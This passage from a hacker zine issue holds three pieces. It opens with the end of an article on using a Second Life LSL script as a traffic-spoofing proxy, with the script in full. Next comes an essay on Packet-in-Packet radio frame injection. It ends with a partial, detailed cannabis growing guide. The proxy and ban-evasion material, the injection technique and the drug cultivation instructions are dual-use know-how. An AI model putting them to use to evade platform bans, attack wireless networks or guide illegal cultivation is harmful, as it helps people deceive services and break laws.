llHTTPRequest()). Additionally, a PHP page could be created that rewrites the content sent back by the LSL script and so that the links send the requests back through the script in Second Life. Not only IPs, but headers, timezone, DNS requests and everything else gets spoofed that way. The possibilities are limitless and I have seen viewers emerge that rely on this concept, such as CryoLife or NeilLife. However, the identification strings sent by the few versions lying around the net have been tagged and any user connecting with them would be banned. If you want to amuse yourself further, you may want to have a look at: http://wiki.secondlife.com/wiki/User:Crone_Dryke Dedicated to CV. Many thanks to the Phrack Staff for their help and their interest in the article. Thank you for your time! ------[ B. Bibliography [1] The Second Life website, http://secondlife.com/ [2] Linden Labs official website, http://lindenlab.com/ [3] Linden Scripting Language LSL Wiki, http://wiki.secondlife.com/wiki/LSL_Portal [4] Imprudence Viewer downloads, http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads [5] The Phoenix Viewer, http://www.phoenixviewer.com/ [6] The third-party viewer policy, http://secondlife.com/corporate/tpv.php [7] GLIntercept, http://oreilly.com/pub/h/5235 [8] Ogre exporters, http://www.ogre3d.org/tikiwiki/OGRE+Exporters [9] QuickTime exploit granting full access to a users machine, http://securityevaluators.com/content/case-studies/sl/ [10] Thumann's presentation on possibilities how to exploit Second Life, https://www.blackhat.com/presentations/bh-europe-08/Thumann/ Presentation/bh-eu-08-thumann.pdf [11] OpenMetaverse Library for Developers, http://lib.openmetaverse.org/wiki/Main_Page ------[ A. Appendix [A. 1] LSL script which requests an publicly accessible URL from the current SIM it is located on, and answers any proxies HTTP requests by accessing the public URL, suffixed with "/url=" where "some URL" represents a web address. The script fetches 2k of the content and then sends it back to the browser. key uReq; key sReq; default { state_entry() { llRequestURL(); } changed(integer change) { if (change & CHANGED_INVENTORY) llResetScript(); } http_request(key id, string method, string body) { if (method == URL_REQUEST_GRANTED) { llOwnerSay(body); return; } if (method == "GET") { uReq = id; list pURL = llParseString2List( llGetHTTPHeader(id, "x-query-string"), ["="], []); if (llList2String(pURL, 0) == "url") sReq = llHTTPRequest(llList2String(pURL, 1), [HTTP_METHOD, "GET"], ""); } } http_response(key request_id, integer status, list metadata, string body) { if (sReq == request_id) llHTTPResponse(uReq, 200, body); } } |=[ 0x06 ]=---=[ How I misunderstood digital radio; or, "Weird machines" are in radio, too! - M.Laphroaig pastor@phrack ]--=| ...there be bytes in the air and Turing machines everywhere When one lays claim to generalizing a class of common misconceptions, it is fitting to start with one's own. These are the things I used to believe about digital radio -- or, more precisely, would not have questioned if explicitly presented with them. === Wishful thinking === The following statements are obviously related and mutually reinforcing: 1. Layer 1 delivers frames to Layer 2 either fully intact frames exactly as transmitted by a peer in their entirety, or slightly corrupted versions of such frames if CRC checking in Layer 1 is disabled, as it sometimes is for sniffing. 2. In order to be received at Layer 1, a frame must be transmitted with proper encapsulation by a compatible Layer 1 transmitter using the exact same PHY protocol. There is no substitution in commodity PHY implementations for the radio chip circuitry activated when the chip starts transmitting a queued Layer 2 frame, except by use of an expensive software defined radio. 3. Layer 1 implementations have means to unambiguously distinguish between the radio transmission that precedes a frame -- such as the frame's preamble -- and the frame's actual data. One cannot be mistaken for another, or such a mistake would be extremely rare and barely reproducible. 4. Should a receiver miss the physical beginning of a frame transmission on the air due to noise or a timing problem, the rest of the transmission is wasted, and no valid frame could be received at least until this frame's transmission is over. For Layer 1 injection, this would imply the following limitations: a. In order to successfully "inject" a crafted Layer 1 frame (that is, to have it received by the target) the attacker needs to (1) build the binary representation of the full frame in a buffer, (2) possess a radio capable of transmitting buffer binary contents, and (3) instruct the radio to transmit the buffer, possibly bypassing hardware or firmware implementations of protocol features that may alter or side-effect the transmission. b. In particular, the injecting radio must perfectly cooperate by producing the proper encapsulating physical signals for the preamble, etc., around the injected buffer-held frame. Without such cooperation, injection is not possible. c. Errors due to radio noise can only break injection. The injecting transmission, as a rule, needs to be more powerful to avoid being thwarted by ambient noise. d. Faraday cages are the ultimate protection against injection, as long as the nodes therein maintain their software and hardware integrity, and do not afford any undue privileges to the attacker. A high-level summary of these beliefs could be stated like this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity and authenticity filter_ for frames. In order to be received, a frame must be transmitted in its entirety via an "authentic" mechanism, the transmitting chip's logic going through its normal or nearly normal state transitions, or emulated by a software-defined radio. Each and every one of these is _false_, as demonstrated by the existence of Packet-in-Packet (PIP) [1,2] exploits. === A Packet Breaks Out === On a cold and windy February 23rd of 2011, my illusions came to an abrupt end when I saw the payload bytes of an 802.15.4 frame's data --- transmitted inside a valid packet as a regular payload --- received as a frame of its own, reproducibly. The "inner" packet, which I believed to be safely contained within the belly of the enclosing frame would occasionally break out and arrive all by itself, without any sign of the encapsulating packet. Every once in a while, there was no whale, just Jonah. It was a very unwelcome miracle for someone who believed he could be safe from even SDR-wielding attackers inside a cozy Faraday cage, as long as his utopian gated community had no compromised nodes. Where was my encapsulation now? Where was my textbook's OSI model? Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet, the textbook illusion of neat encapsulation chief among them. How the books lied. === Packet-in-Packet: a miracle explained === The following is a typical structure of a digital radio frame as seen by the radio: ------+----------+-----+-------------------------------+-----+------ noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise ------+----------+-----+-------------------------------+-----+------ The receiving radio uses the preamble bytes to synchronize itself, at the same time looking for SFD bytes digitally. Once a sequence of SFD bytes matches, the radio starts treating further incoming bytes as the content of the frame, saving them and feeding them into its checksum computation. Consider the situation when the "L2 payload bytes" transmitted after the SFD themselves contain the following, say, as a valid payload of a higher layer protocol: ---------+-----+--------------------+-------------------------------- preamble | SFD | inner packet bytes | valid checksum for inner packet ---------+-----+--------------------+-------------------------------- If the original frame's preamble and SFD are intact, all of the above will be received and passed on to the driver and the OS as regular payload bytes as intended. Imagine, however, that the original SFD is damaged by noise and missed by the radio. Then the initial bytes of the outer frame will be interpreted as noise, leading up to the embedded "preamble" and "SFD" of the would-be payload. Instead, these preamble and SFD will be taken to indicate an actual start of a real frame, and the "inner" packet will be heard, up to an including the valid checksum. The following bytes of the enclosing frame will again be dismissed as noise, until another sequence of "preamble + SFD" is encountered. Thus, due to noise damaging the real SFD and the receiver's inability to tell noise bytes from payload bytes except by matching for an SFD, the radio will occasionally receive the inner packet -- precisely as if it were sent alone, deliberately. Thus a remote attacker capable of controlling the higher level protocol payloads that get transmitted over the air by one of the targeted radios on the targeted wireless network is essentially capable of occasionally injecting crafted Layer 1 frames -- without ever owning any radio or being near the targeted radios' physical location. Yes, Mallory, there is such a thing as Layer 1 wireless injection without a radio. No, Mallory, a mean, nasty Faraday cage will not spoil your holiday. === The reality === Designers of Layer 2 and above trust Layer 1 to provide valid or "authentic" objects (frames) across the layer boundary. This trust is misplaced. There are two factors that likely contribute to it among network engineers and researchers who are not familiar with radio Layer 1 implementations but have read driver and code in the layers above. Firstly, the use of the CRC-based checking throughout the OSI mode layers likely reinforces the faith in the ability of Layer 1 to detect errors -- any symbol errors that accidentally corrupt the encapsulated packet's structure while on the wire. Secondly, the rather complex parsing code required for Layer 2 and above to properly de-encapsulate respective payloads may lead its readers to believe that similarly complex algorithms take place in hardware or firmware in Layer 1. However, L1 implementations are neither validity, authenticity, or security filters, nor do they maintain complex enough state or context about the frame's bytes they are receiving. Aside from analog clock synchronization, their anatomy is nothing more than that of a finite automaton that pulls bytes (more precisely, symbols of the code that encodes the transmitted bytes, which differ per protocol, both in bits/symbol and in modulation) out of the air, continually. The inherently noisy RF medium produces a constant stream of symbols. The probability of hearing different symbols is actually non-uniform and depends on the details of modulation and encoding scheme, such as its error-correction. As it receives the symbol stream, this automaton continually compares a narrow window within the stream against the SFD sequence known to start a frame. Once matched by this shift register, the symbols start being accumulated in a buffer that will eventually be checksummed and passed to the Layer 2 drivers. Beyond the start-of-frame matching automation, the receiver has no other context to determine whether symbols are in-frame payload, our out-of-frame noise. It has no other concept of encapsulation or frame validity. A digital radio is just a machine for pulling bytes out of the air. It has weird machines in that same way -- and for the same reasons -- that a vulnerable C program has weird machines. Such encapsulation based on such a simple automaton is easily and frequently broken in presence of errors. All that is needed is for the chip's idea of the start-of-frame sequence -- typically, some of the preamble + a Start of Frame Delimiter, a.k.a. Sync, or just the latter where the preamble is used exclusively for analog synchronization -- to not match, for the subsequent payload bytes to be mistaken for the start-of-frame sequence or noise. In fact, to mislead the receiving automaton to the _intended meaning_ of symbols (or bytes they are supposed to make up or come from) no crafting manipulation is necessary: the receiving machine is so simple that _random noise_ alone provides sufficient "manipulation" needed to confuse its state and allow for packet-in-packet injection. Thus injection for attackers without an especially cooperative radio or in fact any radio at all -- so long as the attacker can leverage some radio near the target to produce a predictable stream of symbols -- is enabled by broken encapsulation. === What does this remind me of? === I remember the first time I witnessed a buffer overflow exploit, when my Internet-facing Linux box, name Miskatonic, was exploited. Whoever did that also opened a whole new world to me, and I'll be happy to repay that debt with a beer should we ever meet in person. At that time, I was a fairly competent C programmer, but I saw the world in terms of functions that called other functions. Each of these functions returned after being called to whichever address it had been called from. I thought that the only way for a piece of code to ever get executed was to be inside a function called at some point. In other words, I regarded C functions as "atomic" abstractions. Even though I implemented simple recursion and mutually recursive functions via my own stacks a few times, it never occurred to me that a real call stack could be anything other than a neat and perfect data structure with "push", "pop", and referencing of variable slots. Beware layers of abstractions. Take their expected, specified operation on faith, and they will appear real. It is tempting to trust a lower abstraction layer to provide _only_ the valid data structures your next layer expects to receive, to assume that the lower layer's designers already took responsibility for it. It is so tempting to limit your considerations to the detail and complexity of the layer you are working in. Thus the layers of abstraction become boundaries of competence. This temptation is overpowering on well-designed, abstraction-oriented environments, where you lack any legal or effective means of PEEK-ing or POKE-ing the underlying layers. Dijkstra decried BASIC as a mind-mutilating language, but most real BASICs had PEEK and POKE to explore the actual RAM, and one sooner or later found himself wondering what they did. I wonder what Dijkstra would have said about Java, which entirely traps the mind of a programmer in its abstractions, with no hint of any other ways or idioms of programming. === How we could have avoided falling for it === The key to understanding this design problem is the incorrect assumptions about how input is handled, in particular, of how it is handled as a language, and the machine that handles it. The _language-theoretic approach_ to finding just such misconceptions and exploitable bugs based on it was developed by Len Sassaman and Meredith L. Patterson. Watch their talks [3,4] and look for upcoming papers at http://langsec.org Such a language-theoretic analysis at L1 would have revealed this immediately. Valid frames are phrases in the language of bytes that a digital radio continually pulls out of the air, and the L1 seen as an automaton for accepting valid phrases (frames) should reject everything else. The start-of-frame-delimiter matching functionality within the radio chip is just a shift register and a comparison circuit -- too simple an automaton, in fact, to guarantee anything about the validity of the frame. With this perspective, the misconception of L2 expecting frame encapsulation and validity becomes clear, almost trivial. The key to finding the vulnerability is in choosing this perspective. Conversely, there is no nicer source of 0-day than false assumptions about what is on the other side of an interface boundary of a textbook-blessed design. The convenient fiction of classic abstractions leads one to imagine a perfect and perfectly trustworthy machine on the other side, which takes care of serving up only the right kind of inputs to one's own layer. And so layers of abstraction become boundaries of competence. References: [1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro, Ryan Speers, "Packets in Packets: Orson Welles' In-Band Signaling Attacks for Modern Radios", USENIX WOOT, August 2011, http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf [2] Travis Goodspeed, Remotely Exploiting the PHY Layer, http://travisgoodspeed.blogspot.com/2011/09/ remotely-exploiting-phy-layer.html [3] Len Sassaman, Meredith L. Patterson, "Exploiting the Forest with Trees", BlackHat USA, August 2010, http://www.youtube.com/watch?v=2qXmPTQ7HFM [4] Len Sassaman, Meredith L. Patterson, "Towards a formal theory of computer insecurity: a language-theoretic approach" Invited Lecture at Dartmouth College, March 2011, http://www.youtube.com/watch?v=AqZNebWoqnc |=[ 0x07 ]=--=[ The 1130 Guide to Growing High-Quality Cannabis - 1130 ]-=| So you wanna grow marijuana? You wanna get high off your own buds? Well this guide will surely teach you how. I'll assume you're already somewhat familiar with Mary-Jane, so I won't explain all the jargon in deep detail. Table of Contents 0x00: General Botany -- basic plant knowledge 0x01: Environment -- air, temperature, and humidity 0x02: Container -- size and shape 0x03: Water -- temperature and filtering 0x04: Nutes -- plant food 0x05: Conductivity and pH -- don't burn the roots 0x06: Hydroponics -- how-to hydro 0x07: Light -- which and why 0x08: Cloning -- make 'em root 0x09: Vegging -- big 'n' bushy 0x0A: Flowering -- dense and dank 0x0B: Harvest -- chop, dry, and cure 0x0C: Extracts -- smoke, vape, and cook 0x0D: Signs and Symptoms -- oh noes, wtf mang! 0x00: General Botany If you've never grown before, growing cannabis can be difficult. Really though, it just depends on how much time you put in. As long as you check in on your plants 3-4 times a day, you'll begin to learn enough about them to grow some really dank buds. But to get you started, here are a few things you should know. Plants need light, water, air, and food to grow. A lack of any one of these at best will slow its growth and at worst will cause part or all of it to die. Light is generally the most limiting factor in determining a plant's growth rate, but that assumes all other factors are maxed. Plants absorb water and nutrients through their roots and carbon dioxide (CO2) through their leaves. They also need a bit of oxygen which they absorb through both leaves and roots. Chloryphyll is a chemical in their leaves that's used as a catylyst with energy from light to convert CO2 and water into sugars and oxygen. Chloryphyll-a is also what gives leaves their green color, while Chloryphyll-b is responsible for the yellow color of leaves. Plants need oxygen in order to burn energy to stay alive and grow, like we do, but plants produce much more oxygen than they consume. Plants are not able to move enough oxygen from the leaves down to the roots, so roots must have access to some oxygen in order to stay alive. When soil dries, air fills the space in the ground, and so soil must dry enough so that the roots can have air to breathe. Cannabis has two main kinds of roots. There are the taproots which can grow very large and persist through dryness, and there are the feeder hairs. Feeder hairs will not survive very long without water, but since the roots need air to breathe the soil must dry out enough between waterings. Thus, it is important to let soil dry enough so it is not wet but still retains enough moisture to keep the feeder hairs alive. If they die, they must grow back before the plant can begin absorbing more nutrients. An easy way to tell if the soil is properly dry is if the color is still dark (not a lighter brown as when the dirt is "bone-dry") but the soil does not stay clumped together as it does when wet. Plants require three macronutrients to survive: N-P-K, or Nitrogen (Nitrates), Phosphorus (Phosphates), and Potassium (Potash). Nitrogen is primarily responsible for the green color in vegetative matter. It is not as important in fruits and flowers. Phosphorus is needed for root growth and is also the primary nutrient for fruits and flowers. Potassium is used throughout the plant to provde support; more Potassium means stronger, stiffer stems and branches which provide better support for dense buds. 0x01: Environment Although cannabis grows in pretty much any condition (it is a weed, after all), optimal conditions produce optimal growth rates. Certain strains may be more picky than others, but generally you want the following: Humidity Cloning: 90-100% Vegging: 50-80% Flowering: 40-50% Temperature should always be 68-75F (20-24C). Lower temps increase humidity, and higher temps reduce humidity. Plants drink through their leaves as well as their roots, and they need humidity to do this. They also transpire through their leaves when temperatures are too high. Keep this in mind when checking your levels and diagnosing your plants. For instance, if the environment's been hotter than ideal and the air is dry, a small watering in between regular waterings may be necessary to protect the roots near the topsoil and prevent the plant from going into shock. Air flow is very important. Basically you want to see the leaves moving at all times. Proper air flow does two things: it moves the air right around the leaves so the plant always has access to CO2, and the continuous leaf movement causes the plant to react and grow stronger stems which you need to support those massively dense buds you wanna grow. Too much airflow isn't a big deal as long as the plants aren't falling over. Technically, moving air will reduce air pressure and thus temperature will drop slightly, so if heat is a problem for you consider keeping your fan on a higher setting. But the more air flow, the more the plants transpire, and the more water they'll need. 0x02: Container Cannabis needs a proper container to provide optimal root growth. In shape, the best container is wider than it is tall. If growing outdoors, a raised bed of good soil does wonders. Indoors, wide pots or trays work very well. You'll need to decide if you want to grow in soil or a hydroponic medium. There are pros and cons to both. Soil with compost is ideal for outdoor organic growing -- after preparation nature helps keep the roots healthy, and with a good compost mix most of the time plain water is all that's needed. If growing in pots, soil is still a good choice, but you will definitely have to supplement the water with additional nutrients, or you can use dry fertilizers that you work into the topsoil. Indoor growing is much different than outdoor, and growing hydroponically adds a-whole-nother set of variables. If you're lazy, you have two options: grow in soil (soil is very forgiving), or build an automated setup. An automated setup is one that takes care of watering for you, so all you need to do is regular checkups, trimming, and checking on your reservoir. I'll go into detail about different hydroponic setups later on. 0x03: Water Yes, a whole section on water, albeit a short one. Water temperature should be a little less than air temperature, although the roots will tolerate pretty cold water. Never give your plants water that's less than 50F (10C); you'll risk shocking the roots and stunting growth for a few days. Water should be clean of excess salts, especially chlorine and chloramines. Soil gardens will tolerate the chlorines much better than hydro, but you should really get a water filter. A carbon filter is usually fine, but if your water source is really bad you might want to consider Reverse-Osmosis. RO filters are expensive, but they also reduce the conductivity of the water to the lowest possible levels, allowing you to add more nutrients without burning the roots. Carbon filters are pretty cheap, and you could even use a regular drinking water filter. 0x04: Nutes I do love organic; there's nothing quite like the taste of organically grown buds, but I do find that synthetic nutrients give amazing results. If you're not growing for personal use, synthetics are cheaper and can give very high yields. Either way, I'd recommend using a premade blend made by a name-brand company -- when you're starting out it's just not worth trying to play chemist, just get the kit. I use liquid nutrients for both hydro and soil, but dry feeds will work in soil and any non-recirculating hydro setup (e.g. feed and drain in coco). Liquid nutrients are designed to be instantly accessible by the plants, whereas dry feeds are usually time-release. Here are some rough empirical NPKs: Cloning: 1-3-4 Vegging: 3-2-4 Flowering: 1-4-5 Aside from Nitrogen, Phosphates, and Potash, plants also need micronutrients. Iron, Calcium, and Magnesium and at the top, with still many others required to proper growth. Most organic mixes will have these even though they won't specify on the bottle, but if you're growing with synthetics you will have to supplement. Molasses has Fe, Ca, and Mg, and the sugar content helps both feed microbials and rinse out the growing medium. Various Vitamin B-1 mixes will have most necessary micronutrients. Cal-Mag supplements are good too, but be aware when using in conjunction with molasses so you don't overfeed. In general, I recommend starting with less than half of the listed usage on the nutrient containers and then increasing as you see fit. It's a lot easier to see that your plants' leaves are a lighter green than you would want and then to increase the Veg mix than to use too much and burn your plants and have to start all over. If growing in soil, try starting at a quarter-strength and using it with every watering. Increase as necessary to compensate for light color and plant size. 0x05: Conductivity and pH Soil/medium pH and water pH are measured differently, but as long as you regulate the water pH there's no reason to worry about the soil. If you can afford it, I highly recommend getting a pH/Conductivity meter; some also measure PPM (parts per million), though it's usually a conversion from conductivity (measures in milliSiemens). I don't even pay attention to the usage on the nutrient bottle anymore, but I fill my resevoir according to the conductivity. I find it to be much more accurate than measuring the volume of water in gallons and using measuring cups for nutrients. Required pH will depend entirely on your medium. In pure hydro/aero setups, this is 5.6-5.8 for veg and 5.8-6.0 for flowering. In coco coir, this is a bit higher: 6.0-6.2 for veg and 6.2-6.5 for flowering. In soil, it really depends on what's in the mix, but it usually ranges in 6.5-6.8 for veg and 6.8-7.0 for flowering. Cloning should be in between the values for veg and flowering (5.8 for hydro, 6.2 for coco, and 6.8 for soil). pH mostly affects the nutrients that are available for the roots to absorb. The lower ranges increase nitrogen uptake, and the higher ranges increase phosphates. Since nitrogen is more important for veg and phosphate for flowering, this explains why the ranges are different for each phase. If pH varies by a point or two, it's not a big deal, but too strong in either direction can cause root-burn as well as deficiencies in both macro and micronutrients. Conductivity requirements depend on the age/size of the plant. I suggest starting with these maximums and steadily increasing for larger containers so long as no signs of problems occur: For soil/hydro: Cloning: 0.8/1.2 mS Vegging: 1.6/2.0 mS (containers up to 2 gallons) Flowering: 2.4/3.0 mS (containers up to 5 gallons) In general, conductivity >3.0 mS can be dangerous, so above that range only increase once/week and only 0.1-0.2 mS at a time. 0x06: Hydroponics Hydro is awesome. Plants have the ability to grow continuously and at a very rapid pace, but they need extra care, and problems with nutrients or pH often occur so quickly that by the time you realize there's a problem it's usually too late. For first-timers, I'd recommend coco coir. If you're ambitious, consider building your own aeroponic system. In general, there are two types of systems: recirculating, and drain-to-waste. I'll list each medium and give some details about which system is appropriate. For recirculating, you'll want to drain and change your reservoir at least once a week in addition to topping it off regularly, whereas if using a drain-to-waste system only topping off is necessary. Coco coir: Coco coir is a part of the coconut husk that by itself can take years to break down, hence its designation as a hydroponic medium. It's commonly used as bedding for worms. It's highly absorbent and expands to sometimes five times its dry volume when wet. It also holds air very well. Coco coir is nice because it's very difficult to over-water your plants with it since it holds so much air, and the shrinking in between waterings adds additional air to the medium. Drain-to-waste is best for coco because bits of the medium will also drain out, and you don't want these clogging up your pump or lines. Depending on the size of the container and plants, coco requires 1-3 feedings/day. Rockwool: Rockwool is woven fibers of rock made by Grodan. Rockwool is very absorbent, and it's easy to see when it is drying up. Like coco, rockwool is very porous and holds air very well. I prefer rockwool for cloning. Ebb and flow (flood and drain, recirculating) or drain-to-waste both work well with rockwool. Fast growing plants may require up to 5-6 waterings/day depending on the size of medium. Timers come in handy here. For ebb and flow, flood for 10-15 minutes, then drain. For drain-to-waste, feed as needed, allowing 5-10% of the water feed to drain, ensuring complete saturation of the medium. Hydroton, Perlite, or other Pebbles: Hydroton is a manufactured expanded-clay medium. Perlite is a volcanic glass/rock, also expanded, and very porous. Both are better than filling a container with rocks/pebbles, although you could do that if you're really trying to save money. Hydroton and perlite do hold some water, but they drain very quickly and so should not be left without water for an extended period of time. Ebb and flow or continuous drip work well here. Drain-to-waste is very inefficient since the medium doesn't hold water for very long, and so very accurate timings would be needed to prevent excessive waste. If using a continuous drip, consider aerating the reservoir with an air pump to ensure roots have access to oxygen. For ebb and flow, flood at least 1-2 times per hour with no more than 15 minutes of dry time. Aeroponic Aeroponic growing is sweet. There's little-to-no chance of overwatering or underwatering (unless your pump breaks) as the roots always have access to water, nutrients, and air. For this, you'll need to contruct a sprayer assembly inside a reservoir. Rubbermaid containers are cheap and work well. cut 2" holes in the lid (or whatever size gasket you have) and fill the holes with cylindrical foam gaskets to hold the plants. Plant roots hang down freely into the reservoir. Construct the sprayer assembly using PVC piping and small 180- and 360-degree sprayers depending on placement. The assembly should be as short as possible but have at least 2-3 inches above the pump and below the sprayers at the top. Use a submersible pump, and fill the reservoir to above the pump but below the sprayers. You will need an NFT (Nutrient Film Technique) style timer for the pump. These typically operate on cycles of 1 minute on and 4 minutes off or 3 minutes on and 5 minutes off. I've seen cheap adjustable ones on Ebay. You can also make one yourself with an arduino and a relay pretty easily. Just make sure that the cycle allows for time in between sprayings to provide the roots access to air. An air pump here also works well. Deep Water Culture: DWC is simple, easy, and efficient. It's basically an aeroponic system but with a much deeper reservoir, allowing the roots to grow down into the nutrient solution. A sprayer system similar to the aeroponic one described above can be used, or a top-drip works as well. For a top-drip, fill a pot with Hydroton or another medium, and set the pump to continuously pump feed from the reservoir underneath to the pot on top. An aerator for the nutrient solution is necessary here so that roots hanging down into the solution have access to air. Aquaponic: When I first read about this I was blown away. Aquaponic combines hydro with an aquarium. Basically, you have a large reservoir with a DWC setup, but additionally you have fish living inside as well. The fish and plants eat each other's waste (just like in nature!), and they both feed on fish meal which is one of the most common organic plant foods. Guppies are usually the best choice for fish since they're cheap and reproduce quickly, although any freshwater fish will work. 0x07: Light Light is arguably the most important factor in growing. Typically it is the most limiting factor. There are many different types of lights, and each has its own benefits. Halogen lights are most common in professional grows, fluorescents are cheap and efficient, and LEDs are gaining popularity. Here's some info on each: Good ol' incandescents: These provide light, they sure do, but they also provide heat. They're best used as supplemental light when you need the added heat as well, otherwise just go with a fluorescent. Fluorescents: Fluorescents come in many sizes, shapes, and spectrums. Spectrum is rated by color temperature in Kelvins. A 6500K light is usually recommended as it provides the closest spectrum to the Sun's white light. In general, the higher the K, the better. Fluorescents are great for all phases of growth, but they're best suited for clones, mothers, and vegetative plants when you have an HPS available for flowering. Even so, they're always great to consider as supplementals since they're so cheap and efficient. Metal-Hallides: MH Halogens are extremely effective for the vegetative phase. They work for flowering as well, but are not as effective as HPS lights. A 400-watt MH can cover a 3x3ft area, 600-watt covers 4x4', and 1000-watt covers 6x6'. Of course, additional light is nice. High-Pressure Sodium: HPS lights are best for flowering. They have a spectrum more concentrated in the red/yellow end which plants tend to absorb more during the autumn season (when flowering). In every test I've ever seen, HPS lights outperform all other lights in flowering production, watt for watt (or lumen-equivalent in the case of LEDs and fluorescents). HPS lights also generate a lot of heat, so keep that in consideration. LEDs: LED lights are extremely efficient, but they're also expensive. In the long run, they're worth it, but they can take a few cycles to pay themselves off. LEDs come in combinations of red and blue (more red for flowering), and sometimes other colors are added as well. If space permits, I'd still recommend using an HPS along with LEDs for flowering, but LEDs are great for the vegetative phase. With all lights, the inverse-square law applies, meaning if you cut the distance from light to plant in half, you quadruple the light received, and vice versa, if you double the distance you quarter the light received. Too much light can be a bad thing. Plants that are too small or do not have enough water/nutrients to use will not be able to use all the light that hits them and their leaves will burn. Also, there are areas close to the lights that are called hotspots. These are areas where reflected light is concentrated, and plants in these spots are more likely to burn since the light there is very intense. The rule-of-thumb is use your hand: if it's too hot for you, it's too hot for the plants. 0x08: Cloning Cloning is the process of taking cuttings from a "mother" and allowing these cuttings to root into plants of their own. In addition to your mother plant, you'll need a sharp pair of snips, a humidity dome, cloning medium, filtered water, cloning gel/powder (optional), nutrients (optional but recommended), and a light that will be on 24-hours/day (a single fluorescent is sufficient). Here is a step-by-step process: Prepare your mothers by giving them plain water (along with a flushing solution if you like, a bit of molasses works well) at least a day before cutting clones. This helps flush out excess Nitrogen so that the clones can root more quickly. Prepare the cloning solution. This can be plain water, but I like to add a mix of flowering nutrients (better than vegging nutrients for rooting, nitrogen is bad for cloning) and kelp and algae extracts. Balance the pH of the solution according to the medium you're using, and throoughly soak the medium. I use rockwool. Other alternatives are Groplugs, Coco, and soil. Any growing medium can work, really.I also like to keep a pool of solution in the bottom tray of the humidity dome to help keep the humidity high as well as provide food for the plants once they root. You can even allow the medium to soak for the first 3-4 days of cloning to help speed up root growth, just be sure to drain it after that. Cut the clones. I've cut both small and tall clones, and the small ones work very well too. Leave at least 2" (about 5cm) of stem underneath the highest leaves. You can trim leaves off to save space, if you want. This allows you to pack more clones inside the dome. Otherwise, I like to leave the leaves on (except for the bottom section that's inside the medium). You can place the clone directly in the medium, or you can shave and split the bottom. Splitting the bottom of the stem and shaving off the outer-layer of the bottom of the stem increases the surface area of the cambium layer, kind of like a stemcell layer. From here is where the roots grow. Exposing more can increase the rooting time by a few days, but often you will get much more vigorous root growth. I prefer this method. Dip the stem tip in cloning gel/powder, if you're using it (I don't), then plant the clones inside the medium, and cover the dome. If cutting many clones, I like to keep the dome partially covered (for those already planted) so they don't start wilting right away. After they're all planted and the dome is covered, place the dome under a light that will be on 24-hours/day. Clones need very little light to root, so a single fluorescent is sufficient here, or just some ambient light that will not be shut off. Clones can take anywhere from 5-14 days to root depending on the factors discussed above. I like to keep my clones rooting in the dome until their root masses are about a foot long, though the plants will still be short. This ensures the best chance of avoiding shock when transplanting as well as fairly explosive growth within a couple days of transplanting. 0x09: Vegging Once clones have rooted, the vegetative phase begins. Most strains require at least 18 hours of light/day to prevent them from flowering, though some make require more, up to 24 hours/day. This is the easiest phase to grow in since the plants are vigorous and large enough to tolerate shock. Transplant your clones into the medium of your choice, and begin feeding a mild nutrient solution. For soil gardens, plain water can be used for the first week. Increase the concentration of the nutrient solution over time to accomodate the size of the plant. Consider transplanting to a larger container after two weeks of continuous, vigorous growth. Depending on your setup, you'll want a different target size of your veg plants. A sea of green, for instance, requires many plants next to each other so that they basically form a horizontal plane across their tops, but if you're growing in a small closet with 2-3 plants then you'll probably want them as big as they can fit. There are different stress-techniques used to promote larger growth. Topping is one of the most common. Topping entails cutting off the newest growth of the highest node, generally without trimming much of the larger leaf matter. Topping forces the plant's vascular system to merge at this point, causing more growth nodes to be produced here at the top of the plant. Topping is a preferred method because the top buds of each branch are generally the largest, and more top nodes mean more top nugs. Another technique used is bending. Bending entails taking the tallest branch of the plant and bending it down and to the side, usually tying it down with gardening wire or string. Bending exposes more of the lower nodes to direct light, causing them to grow larger. It also allows more buds to receive direct light, making it another preferred method by many growers. Creasing and snapping branches are a form of "supercropping", and they combine the benefits of topping and bending. The idea is to break the inner part of a branch while keeping it attached to the plant. Lke topping, this causes a merging of the vascular system, and this section of branch later on will grow into a nice bulge. And like bending, the top nodes are pushed outward to allow more light to hit nodes underneath. It is usually best to bandage the plant after supercropping until it has completely healed since this technique can cause a good deal of damage to the plant if left unattended. It's usually best to delay flowering for a couple of weeks after supercropping to allow the plant to fully heal and build support for those super dank buds it'll be growing. 0x0A: Flowering Once your plant has reached the desired size, it's time for flowering. Unless you're growing an autoflowering variety, the flowering cycle is typically triggered by a change in nighttime length, and most often a 12-hour day/12-hour night cycle is used. Some plants will grow considerably during the flowering phase, especially the African Sativas, so keep this in mind; you don't want to trim the plant once it's in full flower production as this causes considerable stress and can cause the female to produce some seeds. For the first couple weeks of flowering, convert about half of your nutrient solution from the veg mix to the flower mix. Convert more to flowering as time passes. After 2-3 weeks, a pure flowering mix should be used. Once the mass of pistils have formed, increase the nutrient concentration. Large, dense buds will develop, and some leaves may yellow and drop. Toward the end of the cycle, pistils will change color (often from white to orange/brown), and from here on consider flushing with plain water. Flushing leaches leftover fertilizer from inside the plant, giving it a much smoother burn. Plants that are harvested without flushing typically will have harsh smoke, even after curing. At the end of the flowering phase, the crystals on the buds, pistils, leaves, and stems will first turn milky-white. After this, they begin to brown. This is when they are ready to pick. Picking later will bring out more of the Indica characteristics (more CBD/CBN), whereas picking earlier will bring out more of the Sativa characteristics (more THC). Picking too early, however, (before crystals have become milky-white) produces weak buds, and often will just give you a headache when smoked. If after flushing the crystals do not appear to change color, feed them once more, with a full, strong solution, then continue flushing. Additional buds will likely grow, and they will be ready soon after. 0x0B: Harvest Harvest the plants by cutting at the base, then hang them upside-down (I dare you to try hanging them right-side up....good luck) in a dark room to dry. A small amount of airflow is necessary, so keep a fan on low but not pointed directly at the plants. After at least one day of full darkness, you can begin trimming. Trim off all the largest leaf first, leaving the smaller, hashy leaves for manicuring later. If this trim does not have crystals/hash on it, discard it, otherwise save for extracts. Manicuring is a bit of a longer process. You can go the quick route, and just trim the ends of the leaves sticking out like so many lazy-ass growers do, or you can properly manicure your buds, making them look better and preventing you from smoking all that leaf matter. To manicure, use a pair of floral trimmers to reach in and cut the leaves at the base of the stem. This is uaully easier then holding the buds upside down since the leaves are below the buds. It takes practice and patience to avoid clipping off whole buds, but even if you do just save them along with the other manicured buds. After the leaf is clipped off, remove excess stem. If the stems fold when you try to break them, the buds are not dry yet; 